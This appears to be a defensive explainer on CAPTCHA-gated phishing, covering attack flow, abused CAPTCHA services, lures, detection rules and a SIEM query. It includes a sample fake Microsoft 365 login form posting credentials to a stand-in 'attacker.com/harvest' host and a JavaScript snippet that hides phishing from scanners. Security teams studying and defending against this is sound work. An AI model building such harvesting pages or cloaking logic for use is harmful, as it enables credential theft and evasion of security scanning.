CAPTCHA-Gated Phishing

Timeline: The Cat and Mouse

2019 ← Attack emerges → 2021 ← Defenses adapt → 2023 ← Multi-stage gates → Present

The Evolution

Key Events with Sources

Overview

Automated security tools scan URLs in emails to detect phishing. Attackers counter by placing CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart) in front of phishing pages. Automated scanners hit the CAPTCHA and see nothing malicious. Human victims solve the CAPTCHA and reach the phishing page.

The Attack

How It Works

┌─────────────────────────────────────────────────────────┐
│  AUTOMATED SCANNER                                      │
│                                                         │
│  Scanning: https://phishing.com/login                   │
│  Result: CAPTCHA page                                   │
│  Content: "Please verify you're human"                  │
│  Malicious indicators: NONE                             │
│  Verdict: CLEAN ✓                                       │
└─────────────────────────────────────────────────────────┘

┌─────────────────────────────────────────────────────────┐
│  HUMAN VICTIM                                           │
│                                                         │
│  Clicks link → CAPTCHA page                             │
│  Solves CAPTCHA → Phishing page                         │
│  Enters credentials → Compromised                       │
└─────────────────────────────────────────────────────────┘

Technical Implementation

Using reCAPTCHA:

<!-- Page 1: CAPTCHA Gate -->
<html>
<head>
    <script src="https://www.google.com/recaptcha/api.js"></script>
</head>
<body>
    <h1>Security Verification Required</h1>
    <form action="/verify" method="POST">
        <div class="g-recaptcha" data-sitekey="[KEY]"></div>
        <button type="submit">Continue</button>
    </form>
</body>
</html>

<!-- Page 2: Phishing Page (after CAPTCHA solved) -->
<html>
<body>
    <h1>Microsoft 365 Login</h1>
    <form action="https://attacker.com/harvest">
        <input name="email" placeholder="Email">
        <input name="password" type="password" placeholder="Password">
        <button>Sign In</button>
    </form>
</body>
</html>

CAPTCHA Services Abused

Google reCAPTCHA:

• Most common, trusted by users
• Free to deploy
• Checkbox or invisible versions

hCaptcha:

• reCAPTCHA alternative
• Also easily deployable
• Image selection challenges

Cloudflare Turnstile:

• Newer, “frictionless”
• Attackers abuse Cloudflare protection

Custom CAPTCHAs:

• Simple math problems
• Image selection
• Harder for automation

Why It Works

Looks Legitimate:

• CAPTCHAs are everywhere
• Users expect security checks
• Google/Cloudflare branding = trust

Defeats Automation:

• Scanners can’t solve CAPTCHAs
• Sandbox analysis blocked
• URL reputation tools see only CAPTCHA

Timing Advantage:

• Even if eventually flagged
• Attack works during initial window
• Manual review takes time

Common Lures

Microsoft 365:

Subject: Document Shared With You
Link: View Document → CAPTCHA → Fake O365 login

Voicemail:

Subject: New Voicemail Message
Link: Listen → CAPTCHA → Credential harvester

Package Delivery:

Subject: Delivery Attempt Failed
Link: Reschedule → CAPTCHA → Phishing page

Defenses

Advanced URL Scanning

Some security tools can:

• Detect CAPTCHA presence (suspicious indicator)
• Use CAPTCHA-solving services
• Employ headless browsers with human simulation
• Flag CAPTCHA + credential form combination

Behavioral Analysis

Look for patterns:

• CAPTCHA on non-login pages (suspicious)
• CAPTCHA leading to credential harvesting
• Recently registered domain + CAPTCHA
• Cloudflare-protected page + login form

URL Reputation

Flag URLs that:

• Use free CAPTCHA services
• Have CAPTCHA on landing page
• Redirect to credential forms after CAPTCHA
• Are newly registered

User Training

Train users to recognize:

• Unexpected CAPTCHAs before login
• CAPTCHAs on unofficial domains
• Security verification for routine tasks
• Suspicious URL destinations

Attacker Adaptation

Multi-Stage Gates

CAPTCHA 1 (reCAPTCHA)
    ↓
CAPTCHA 2 (hCaptcha)
    ↓
Human Verification Question
    ↓
Phishing Page

Each layer increases automation difficulty.

JavaScript Challenges

// Check for human-like behavior
if (mouseMovements < 10 || loadTime < 500) {
    // Likely bot - show nothing
    redirect("/404");
} else {
    // Likely human - show phishing
    showPhishingPage();
}

Session-Based Gating

First visit: CAPTCHA
Session stored: PASSED=true
Subsequent visits: Direct to phishing

Scanner revisits: CAPTCHA again
Same session required: Defeats repeat scanning

Geographic Filtering

If visitor IP in target region: Show phishing
Else: Show benign content or CAPTCHA

Security scanners often in specific regions.

Current State

Status: Active

CAPTCHA gating remains effective:

Detection Guidance

URL Analysis

Flag URLs with:

• CAPTCHA on landing page
• Redirect after CAPTCHA
• Credential forms post-CAPTCHA
• Recently registered + CAPTCHA

Email Context

Suspicious when:

• Unexpected sender + CAPTCHA link
• Urgent theme + verification required
• Known brand + unknown domain

Post-Incident

If user reports:

• What was behind the CAPTCHA?
• Were credentials entered?
• Check for account compromise
• Block the domain

SIEM Queries

email.links.destination.has_captcha = true
AND email.sender.domain NOT IN (trusted_domains)
AND email.links.destination.domain.age_days < 30